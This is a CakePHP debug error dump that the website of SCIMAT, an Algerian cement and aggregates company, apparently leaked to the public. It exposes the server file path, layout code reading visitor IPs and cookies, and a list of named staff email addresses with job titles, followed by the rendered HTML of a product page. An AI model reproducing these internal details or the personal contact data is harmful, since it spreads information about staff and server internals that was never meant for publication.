Notice (8): Undefined index: HTTP_COOKIE [APP/View/Layouts/default.ctp, line 374]Code Context <?php
$ip = $_SERVER["REMOTE_ADDR"];
$ip1 = $_SERVER["HTTP_COOKIE"];
$viewFile = '/home/scimat/public_html/app/View/Layouts/default.ctp'
$dataForView = array(
'mapO' => array(
'Contact' => array(
'id' => '34',
'nom_fr' => 'ScimatContact',
'nom_ara' => 'ScimatContact',
'nom_en' => 'ScimatContact',
'email' => 'contact@scimat.dz',
'adresse_fr' => '73 Bis, Rue Benflis, la Verdure, Batna 05000',
'adresse_ara' => '73 Bis, Rue Benflis, la Verdure, Batna 05000',
'adresse_en' => '73 Bis, Rue Benflis, la Verdure, Batna 05000',
'map' => ' 35.5575, 6.1730',
'fax' => '+(213) 33 85 11 01',
'tel1' => '033 85 13 00/ 26 72',
'tel2' => '',
'tel3' => '',
'mob1' => '',
'mob2' => '',
'mob3' => '',
'date_ajout' => '2021-01-30'
)
),
'produit_desc2' => array(
(int) 0 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 1 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 2 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 3 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 4 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 5 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 6 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 7 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 8 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
)
),
'produit_desc' => array(
(int) 0 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 1 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 2 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 3 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 4 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 5 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 6 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 7 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 8 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
)
),
'produit_pos' => array(
(int) 0 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 1 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 2 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 3 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 4 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 5 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 6 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 7 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 8 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
)
),
'socialMediaLinks' => array(
(int) 0 => array(
'Sociale' => array(
[maximum depth reached]
)
),
(int) 1 => array(
'Sociale' => array(
[maximum depth reached]
)
),
(int) 2 => array(
'Sociale' => array(
[maximum depth reached]
)
),
(int) 3 => array(
'Sociale' => array(
[maximum depth reached]
)
),
(int) 4 => array(
'Sociale' => array(
[maximum depth reached]
)
),
(int) 5 => array(
'Sociale' => array(
[maximum depth reached]
)
)
),
'produits' => array(
(int) 0 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 1 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 2 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 3 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 4 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 5 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 6 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 7 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
),
(int) 8 => array(
'Produit' => array(
[maximum depth reached]
),
'Environement' => array([maximum depth reached]),
'Pemploi' => array([maximum depth reached]),
'Securite' => array([maximum depth reached]),
'Specification' => array([maximum depth reached]),
'Stockage' => array([maximum depth reached]),
'typecomposition' => array([maximum depth reached]),
'Caracteristique' => array([maximum depth reached]),
'Controlequalite' => array([maximum depth reached])
)
),
'contacts' => array(
(int) 0 => array(
'Contact' => array(
[maximum depth reached]
)
),
(int) 1 => array(
'Contact' => array(
[maximum depth reached]
)
),
(int) 2 => array(
'Contact' => array(
[maximum depth reached]
)
),
(int) 3 => array(
'Contact' => array(
[maximum depth reached]
)
)
),
'sociales' => array(
(int) 0 => array(
'Sociale' => array(
[maximum depth reached]
)
),
(int) 1 => array(
'Sociale' => array(
[maximum depth reached]
)
),
(int) 2 => array(
'Sociale' => array(
[maximum depth reached]
)
),
(int) 3 => array(
'Sociale' => array(
[maximum depth reached]
)
),
(int) 4 => array(
'Sociale' => array(
[maximum depth reached]
)
),
(int) 5 => array(
'Sociale' => array(
[maximum depth reached]
)
)
),
'contact' => array(
'Contact' => array(
'id' => '27',
'nom_fr' => 'Direction Générale',
'nom_ara' => 'المديرية العامة',
'nom_en' => 'Executive management',
'email' => 'secretaire.dg@scimat.dz',
'adresse_fr' => '73 Bis, Rue Benflis, La verdure, Batna 05000',
'adresse_ara' => '73 مكرر,شارع بن فليس ,حي الاخظرار باتنة 0500',
'adresse_en' => '73 Bis, Rue Benflis, La verdure, Batna 05000',
'map' => '35.554507,6.17278',
'fax' => '+(213) 33 85 11 01',
'tel1' => '+(213) 33 85 13 00',
'tel2' => '+(213) 33 85 12 95',
'tel3' => '+(213) 33 85 14 54',
'mob1' => '',
'mob2' => '',
'mob3' => '',
'date_ajout' => '2018-11-29'
)
),
'menus' => array(
(int) 0 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 1 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 2 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 3 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 4 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 5 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 6 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 7 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 8 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 9 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 10 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
)
),
'menu' => array(
(int) 0 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 1 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 2 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 3 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 4 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 5 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 6 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 7 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 8 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 9 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 10 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
)
),
'menuara' => array(
(int) 0 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 1 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 2 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 3 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 4 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 5 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 6 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 7 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 8 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 9 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
),
(int) 10 => array(
'Menu' => array(
[maximum depth reached]
),
'Pluspage' => array([maximum depth reached])
)
),
'lien' => 'https://scimat.dz/',
'destintaires' => array(
'chawki.zeghdoud@scimat.dz' => ' Directeur d'Approvisionnement',
'said.fatah@scimat.dz' => ' Directeur Développement ',
'dir.marketing-ventes@scimat.dz' => ' Directeur Marketing et Ventes ',
'djamel.attir@scimat.dz' => ' Directeur des Finances et Budget ',
'foued.dine@scimat.dz' => ' Directeur d'Exploitation ',
'khaled.boulcina@scimat.dz' => 'Directeur d’Unité Agrégats ',
'maammar.bahloul@scimat.dz' => 'Président Directeur Général ',
'malika.chaouche@scimat.dz' => ' Assistante PDG Chargée des Systèmes d’Information ',
'salim.haneche@scimat.dz' => ' Assistant PDG Chargé de la Qualite du Produit ',
'secretaire.dg@scimat.dz' => 'secrétaire PDG',
'dir-rhs@scimat.dz' => 'Directeur des Ressources Humaines et Sociales ',
'abdesselam.aouachria@scimat.dz' => 'Assistant PDG Chargé du Système de Managent Intégré ',
'asst-pdg.contentieux@scimat.dz' => 'Assistant PDG Chargé du Contentieux',
'dir.uc_biskra@scimat.dz' => 'Directeur d'Unité Commerciale BISKRA'
),
'actualites' => array(
(int) 0 => array(
'Actualite' => array(
[maximum depth reached]
),
'Media' => array(
[maximum depth reached]
)
),
(int) 1 => array(
'Actualite' => array(
[maximum depth reached]
),
'Media' => array(
[maximum depth reached]
)
)
),
'sondages' => array(
(int) 0 => array(
'Sondage' => array(
[maximum depth reached]
),
'Proposition' => array(
[maximum depth reached]
),
'Vote' => array(
[maximum depth reached]
)
)
),
'result' => array(
(int) 0 => array(
'Visiteur' => array(
[maximum depth reached]
)
),
(int) 1 => array(
'Visiteur' => array(
[maximum depth reached]
)
),
(int) 2 => array(
'Visiteur' => array(
[maximum depth reached]
)
),
(int) 3 => array(
'Visiteur' => array(
[maximum depth reached]
)
),
(int) 4 => array(
'Visiteur' => array(
[maximum depth reached]
)
),
(int) 5 => array(
'Visiteur' => array(
[maximum depth reached]
)
),
(int) 6 => array(
'Visiteur' => array(
[maximum depth reached]
)
),
(int) 7 => array(
'Visiteur' => array(
[maximum depth reached]
)
),
(int) 8 => array(
'Visiteur' => array(
[maximum depth reached]
)
),
(int) 9 => array(
'Visiteur' => array(
[maximum depth reached]
)
),
(int) 10 => array(
'Visiteur' => array(
[maximum depth reached]
)
),
(int) 11 => array(
'Visiteur' => array(
[maximum depth reached]
)
),
(int) 12 => array(
'Visiteur' => array(
[maximum depth reached]
)
)
),
'Sondages' => array(
(int) 0 => array(
'Sondage' => array(
[maximum depth reached]
),
'Proposition' => array(
[maximum depth reached]
),
'Vote' => array(
[maximum depth reached]
)
)
),
'propositions' => array(
(int) 0 => array(
(int) 0 => array(
[maximum depth reached]
),
(int) 1 => array(
[maximum depth reached]
),
(int) 2 => array(
[maximum depth reached]
)
)
),
'i' => (int) 1,
'lang' => 'fr',
'content_for_layout' => '<div class="aniimate">
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.11.0/jquery.min.js" integrity="sha512-h9kKZlwV1xrIcr2LwAPZhjlkx+x62mNwuQK5PAu9d3D+JXMNlGx8akZbqpXvp0vA54rz+DrqYVrzUGDMhwKmwQ==" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-migrate/1.2.1/jquery-migrate.min.js" integrity="sha512-fDGBclS3HUysEBIKooKWFDEWWORoA20n60OwY7OSYgxGEew9s7NgDaPkj7gqQcVXnASPvZAiFW8DiytstdlGtQ==" crossorigin="anonymous"></script>
<div class="pageProduit_container">
<div class="pageProduit__header">
<p class="pageProduit__header_title les_titre_big">
<p class="les_titre_big prod_title">
Nos Produits </p>
</p>
<p class="pageProduit__header_innertitle">
<span>CIMENTS SAC & VRAC</span><br> GRANULATS & SABLE CONCASSÉ
</p>
</div>
<center>
<div class="pageProduit__slider" >
<div class="pageProduit__slider_element">
<h3 class="pageProduit__slider_element_title">
<br>
<a href="https://scimat.dz//Produits/details/78999" > GICA BETON <br> CEM II A-L 42.5 N </a>
</h3>
<a href="https://scimat.dz//Produits/details/78999" >
<img class="pageProduit__slider_element_img" src="https://scimat.dz//img/produits/produit-1716888973.png" alt="">
</a>
</div>
<div class="pageProduit__slider_element">
<h3 class="pageProduit__slider_element_title">
<br>
<a href="https://scimat.dz//Produits/details/89963" > GICA MOUDHAD <br> CEM I 42.5 N-LH/SR5 </a>
</h3>
<a href="https://scimat.dz//Produits/details/89963" >
<img class="pageProduit__slider_element_img" src="https://scimat.dz//img/produits/produit-1716888919.png" alt="">
</a>
</div>
<div class="pageProduit__slider_element">
<h3 class="pageProduit__slider_element_title">
<br>
<a href="https://scimat.dz//Produits/details/959" > Sable Concassé <br> 0/4 mm </a>
</h3>
<a href="https://scimat.dz//Produits/details/959" >
<img class="pageProduit__slider_element_img" src="https://scimat.dz//img/produits/produit-1611822601.png" alt="">
</a>
</div>
<div class="pageProduit__slider_element">
<h3 class="pageProduit__slider_element_title">
<br>
<a href="https://scimat.dz//Produits/details/485" > Gravier <br> 4/8 mm </a>
</h3>
<a href="https://scimat.dz//Produits/details/485" >
<img class="pageProduit__slider_element_img" src="https://scimat.dz//img/produits/produit-1611822434.png" alt="">
</a>
</div>
<div class="pageProduit__slider_element">
<h3 class="pageProduit__slider_element_title">
<br>
<a href="https://scimat.dz//Produits/details/125" > Gravier <br> 8/15 mm </a>
</h3>
<a href="https://scimat.dz//Produits/details/125" >
<img class="pageProduit__slider_element_img" src="https://scimat.dz//img/produits/produit-1611737181.png" alt="">
</a>
</div>
<div class="pageProduit__slider_element">
<h3 class="pageProduit__slider_element_title">
<br>
<a href="https://scimat.dz//Produits/details/489" > Gravier <br> 15/25 mm </a>
</h3>
<a href="https://scimat.dz//Produits/details/489" >
<img class="pageProduit__slider_element_img" src="https://scimat.dz//img/produits/produit-1611736339.png" alt="">
</a>
</div>
<div class="pageProduit__slider_element">
<h3 class="pageProduit__slider_element_title">
<br>
<a href="https://scimat.dz//Produits/details/9959" > Gravier Ballast <br> 25/50 mm </a>
</h3>
<a href="https://scimat.dz//Produits/details/9959" >
<img class="pageProduit__slider_element_img" src="https://scimat.dz//img/produits/produit-1611734651.png" alt="">
</a>
</div>
<div class="pageProduit__slider_element">
<h3 class="pageProduit__slider_element_title">
<br>
<a href="https://scimat.dz//Produits/details/878836" > Tout Venant Confondu -TVC- 0/31.5 mm <br> </a>
</h3>
<a href="https://scimat.dz//Produits/details/878836" >
<img class="pageProduit__slider_element_img" src="https://scimat.dz//img/produits/produit-1611671534.png" alt="">
</a>
</div>
<div class="pageProduit__slider_element">
<h3 class="pageProduit__slider_element_title">
<br>
<a href="https://scimat.dz//Produits/details/59998" > Filler 0/0,063 mm <br> </a>
</h3>
<a href="https://scimat.dz//Produits/details/59998" >
<img class="pageProduit__slider_element_img" src="https://scimat.dz//img/produits/produit-1611671831.png" alt="">
</a>
</div>
</div>
</center>
</div>
<div class="footer">
<div class="s1">
<p class="title" >
Pour toute information complémentaire,
</p>
<div class="contacternous">
<div class="line"></div>
<p>
Contactez-nous
</p>
<div class="line"></div>
</div>
<div class="contactInfo">
<p> Tél : 033 85 13 00/ 26 72 Fax: +(213) 33 85 11 01 </p>
<p> E-mail : contact@scimat.dz </p>
<p> Adresse : 73 Bis, Rue Benflis, la Verdure, Batna 05000 </p>
</div>
</div>
<div class="s2">
<a style='background: #4267B2 !important ;
filter: drop-shadow(4px 4px 4px black);
width: 35px;
height: 35px;
font-size: 22px;
display: flex;
align-items: center;
justify-content: center;
border-radius: 25px;
color: white !important ; '
href="https://www.facebook.com/scimat.dz ">
<i class="fab fa-facebook-f " aria-hidden="true"> </i>
</a>
<a style='background: linear-gradient(45deg, #405de6, #5851db, #833ab4, #c13584, #e1306c, #fd1d1d) !important ;
filter: drop-shadow(4px 4px 4px black);
width: 35px;
height: 35px;
font-size: 22px;
display: flex;
align-items: center;
justify-content: center;
border-radius: 25px;
color: white !important ; '
href="https://www.instagram.com/ ">
<i class="fab fa-instagram" aria-hidden="true"> </i>
</a>
<a style='background: #25D366 !important ;
filter: drop-shadow(4px 4px 4px black);
width: 35px;
height: 35px;
font-size: 22px;
display: flex;
align-items: center;
justify-content: center;
border-radius: 25px;
color: white !important ; '
href="https://whatsapp.com ">
<i class="fab fa-whatsapp" aria-hidden="true"> </i>
</a>
<a style='background: #FF0000 !important ;
filter: drop-shadow(4px 4px 4px black);
width: 35px;
height: 35px;
font-size: 22px;
display: flex;
align-items: center;
justify-content: center;
border-radius: 25px;
color: white !important ; '
href="http://www.youtube.com/@scimatgica ">
<i class="fab fa-youtube" aria-hidden="true"> </i>
</a>
<a style='background: #4267B2 !important ;
filter: drop-shadow(4px 4px 4px black);
width: 35px;
height: 35px;
font-size: 22px;
display: flex;
align-items: center;
justify-content: center;
border-radius: 25px;
color: white !important ; '
href="linkedin.com/in/scimat ">
<i class="fab fa-linkedin" aria-hidden="true"> </i>
</a>
<a style='background: #4267B2 !important ;
filter: drop-shadow(4px 4px 4px black);
width: 35px;
height: 35px;
font-size: 22px;
display: flex;
align-items: center;
justify-content: center;
border-radius: 25px;
color: white !important ; '
href="www.twitter.com/ScimatGica ">
<i class="fab fa-twitter" aria-hidden="true"> </i>
</a>
</div>
</div>
<script type="text/javascript" src="./js/slick.js"></script>
<script type="text/javascript">
$(document).ready(function(){
$('.pageProduit__slider').slick({
autoplay: true,
infinite: true,
slidesToShow: 1,
slidesToScroll: 1,
accessibility: true,
autoplaySpeed: 2500,
focusOnSelect: false,
mobileFirst: true,
prevArrow:"<img class='a-left control-c prev slick-prev pageProdu_arrow' src='https://scimat.dz/img/icons/Blue Arrow 1.png' >",
nextArrow:"<img class='a-right control-c next slick-next pageProdu_arrow' src='https://scimat.dz/img/icons/Blue Arrow 2.png' >"
});
});
</script>
</div>',
'scripts_for_layout' => '',
'title_for_layout' => 'Produits'
)
$mapO = array(
'Contact' => array(
'id' => '34',
'nom_fr' => 'ScimatContact',
'nom_ara' => 'ScimatContact',
'nom_en' => 'ScimatContact',
'email' => 'contact@scimat.dz',
